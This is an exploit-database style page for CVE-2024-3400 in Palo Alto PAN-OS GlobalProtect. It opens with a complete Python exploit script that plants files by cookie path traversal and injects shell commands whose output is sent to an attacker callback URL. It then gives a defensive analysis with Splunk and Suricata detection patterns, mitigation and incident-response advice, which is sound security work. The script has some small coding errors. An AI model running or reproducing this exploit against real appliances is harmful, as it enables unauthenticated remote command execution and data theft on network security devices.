Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation

Exploit Author: Kr0ff Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2024-04-21 
# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation
# Date: 21 Apr 2024
# Exploit Author: Kr0ff
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400
# Software Link: -
# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 
#          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1
#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1
# Tested on: Debian
# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:
    import argparse
    import requests
except ImportError:
    print("Missing dependencies, either requests or argparse not installed")
    sys.exit(2)

# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis 
# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

def check_vuln(target: str, file: str) -> bool:
    ret = False
    
    uri = "/ssl-vpn/hipreport.esp"
    
    s = requests.Session()
    r = ""
    
    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    } 
    
    headers_noCookie = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }
    
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if r.status_code == 200:
        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
        if r.status_code == 403:
            print("Target vulnerable to CVE-2024-3400")
            ret = True
    else:
        return ret

    return ret
    
    

def cmdexec(target: str, callback_url: str, payload: str) -> bool:
    ret = False
    p = ""

    if " " in payload:
        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    headers = {
                "User-Agent" : \
                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": \
                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"

            } 

    s = requests.Session()
    r = ""
    
    if not "http://" or not "https://" in target:
        target = "http://" + target   
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTP\" !{e}")

        print("Trying with \"HTTPS\"...")

        target = "https://" + target
        try:
            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
        except requests.exceptions.Timeout or requests.ConnectionError as e:
            print(f"Request timed out for \"HTTPS\"")
            sys.exit(1)
    else:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )

    if not "Success" in r.text:
        return ret

    else:
        ret = True

    return ret

#Initilize parser for arguments
def argparser(selection=None):
    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )
    
    subparser = parser.add_subparsers( help="Available modules", dest="module")
    
    exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")
    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )
    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )
    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )
    #---------------------------------------
    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )
    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )
    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )

    args = parser.parse_args(selection)
    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])
    
    if args.module == "exploit":    
        cmdexec(args.target, args.callbackurl, args.payload)

    if args.module == "check":
        check_vuln(args.target, args.filename)

if __name__ == "__main__":
    argparser()
    print("Finished !")


Palo Alto PAN-OS (< v11.1.2-h3) — CVE-2024-3400: Command Injection and Arbitrary File Creation

Executive summary

CVE-2024-3400 is a command injection and arbitrary file creation vulnerability affecting several PAN-OS releases that expose the GlobalProtect/SSL-VPN portal. An unauthenticated or partially authenticated request to the SSL-VPN endpoint can be crafted in a way that causes the appliance to write attacker-controlled content and, in some cases, execute system commands. Successful exploitation can lead to remote command execution, persistence, and information disclosure on affected devices.

Why this matters

  • Network security appliances are high-value targets: they sit in the trust path and often carry elevated access to logs, credentials, and network flows.
  • Command injection on a PAN-OS device can lead to long-term compromise, lateral movement, and bypass of monitoring that relies on the appliance.
  • Many organizations expose GlobalProtect/SSL-VPN portals for remote access, increasing attack surface if not hardened or patched.

Affected versions (vendor advisory basis)

Major branchAffected minimum versions
PAN-OS 11.1All releases prior to 11.1.0-h3, 11.1.1-h1, and 11.1.2-h3
PAN-OS 11.0Releases prior to 11.0.0-h3, 11.0.1-h4, 11.0.2-h4, 11.0.3-h10, 11.0.4-h1
PAN-OS 10.2Releases prior to 10.2.0-h3, 10.2.1-h2, 10.2.2-h5, 10.2.3-h13, 10.2.4-h16, 10.2.5-h6, 10.2.6-h3, 10.2.7-h8, 10.2.8-h3, 10.2.9-h1

References

Technical overview (high-level)

The vulnerability resides in the handling of SSL-VPN portal requests (GlobalProtect web endpoint). Specifically, inadequate sanitization or improper handling of user-supplied header values and session identifiers can cause path traversal and shell-interpretable content to be written to locations the system subsequently processes. That combination can allow an attacker to cause arbitrary files to be created by the appliance and, in certain exploitation paths, to trigger command execution on the underlying OS.

This is a type of web application injection + insecure file write: attackers abuse normal web requests to create files in privileged locations or inject command-bearing strings that are executed by some internal process or cron-type mechanism.

Potential impact

  • Remote code execution on the PAN-OS appliance
  • Arbitrary file creation that could be used for persistence or to exfiltrate data
  • Compromise of administrative credentials or cryptographic material stored on the appliance
  • Network interception or alteration if the appliance’s packet-processing or logging pipelines are tampered with

Detection: what to look for

Detection should focus on the abused endpoint, unexpected file writes, and unusual header values in HTTP(S) requests to the GlobalProtect portal. Important signals include POSTs to the SSL-VPN portal path, Cookie headers with path traversal or shell meta-characters, unexpected 200/403 responses correlated to requests that should be unauthenticated, and newly created files in the appliance logging or temporary directories.

Splunk example: find suspicious POSTs to the GlobalProtect portal


index=web_proxy OR index=web_access
(("ssl-vpn/hipreport.esp" OR "/ssl-vpn/hipreport.esp") AND method=POST)
| table _time, src_ip, dest_ip, http_user_agent, http_cookie, http_status
| search http_cookie="*SESSID=*"
| where match(http_cookie, "[\`\$\(\\\)]") OR match(http_cookie, "\.\./")

Explanation: This query looks for POST requests to the GlobalProtect hipreport endpoint, returns relevant headers, and filters for Cookie headers that contain potential shell metacharacters (` or $() ) or path traversal sequences (../). Adjust indexes and field names for your environment.

Suricata/IDS rule example (detection-focused)


alert http any any -> any any (msg:"PAN-OS CVE-2024-3400 - suspicious GlobalProtect POST"; \
http.uri; content:"/ssl-vpn/hipreport.esp"; nocase; http_header; content:"SESSID="; \
pcre:"/SESSID=.*(\.\.\/|`|\$\(.*\))/"; sid:1000001; rev:1;)

Explanation: This Suricata rule alerts on HTTP requests to the hipreport.esp endpoint that contain an SESSID header value with path traversal or shell metacharacters. It is intentionally generic to avoid false negatives; tune the regex for noise reduction in production.

Appliance log and filesystem checks (safe, non-destructive)


# Check the PAN-OS version via management CLI (safe)
> show system info | match sw-version

# Grep management or webserver logs for the endpoint (example)
> grep -i "hipreport.esp" /var/log/* 2>/dev/null

Explanation: The first command retrieves the installed software version for comparison with vendor advisories. The grep is a safe look-up for requests that reference the hipreport endpoint; paths and log filenames vary by PAN-OS version and support settings.

Mitigation and remediation

  • Apply vendor patches immediately. The primary remediation is to upgrade PAN-OS to a non-affected release as provided in Palo Alto Networks’ advisory. Plan upgrades according to your maintenance windows and follow vendor guidance for hotfix deployment.
  • Restrict access to the SSL-VPN/GlobalProtect portal. Limit management and portal access to trusted source IPs via firewall rules, MFA, and zero-trust segmentation.
  • Harden exposure: If the portal is not required externally, disable external access or move it behind an authenticated reverse proxy or VPN with additional inspection.
  • Network controls: Use web application firewall (WAF) signatures or IDS rules to block requests that exhibit path traversal or contain shell metacharacters in headers or cookies.
  • Auditing and monitoring: Increase logging level around GlobalProtect endpoints temporarily and monitor for indicators described in the Detection section.
  • Rotate secrets: If a device is suspected to be compromised, rotate credentials, keys, and any certificates that may have been exposed or accessible.

Short-term workarounds when patching is delayed

  • Restrict access to the GlobalProtect portal to known IPs only.
  • Block or filter HTTP(S) requests containing suspicious Cookie values at the perimeter (WAF/IDS).
  • Disable or temporarily remove the portal if business operations allow.

Incident response guidance

  • Immediately isolate affected appliances from management networks until integrity is confirmed.
  • Collect volatile evidence: current processes, open network connections, and running cron jobs.
  • Preserve logs and create full backups of appliance configs for forensic analysis.
  • Search for arbitrary files and unexpected scripts in temporary directories and logging locations (be cautious — changes to a live appliance can affect operations).
  • If compromise is suspected, follow a full containment-and-eradication plan: rebuild or reimage appliances from known-good software, restore configurations from trusted backups, and rotate credentials.

Safe testing and validation

Do not perform exploit attempts against production appliances. If you need to validate whether your environment is vulnerable, perform checks in an isolated lab or maintenance window, and preferably use vendor-provided proof-of-fix tests or consult Palo Alto Networks TAC for validation. Use the benign detection queries above to identify indicators without generating malicious requests.

Practical recommendations for operators

  • Maintain an inventory of PAN-OS devices and their versions; use automated tools or configuration management databases for continuous visibility.
  • Subscribe to vendor advisories and patch notifications to reduce time-to-patch.
  • Implement in-line detection (WAF/IDS) that inspects headers and cookie values for suspicious patterns.
  • Adopt least-privilege administrative practices and multi-factor authentication for device management.
  • Plan for appliance recovery: keep versioned backups and ensure configuration backups are securely stored off-device.

Timeline and disclosure

Follow Palo Alto Networks’ advisory for official timeline, CVE details, and fixed releases. Public analysis and writeups provide additional context; use them to enhance detection and incident response playbooks, but rely on the vendor for official remediation guidance.

Further reading and vendor advisory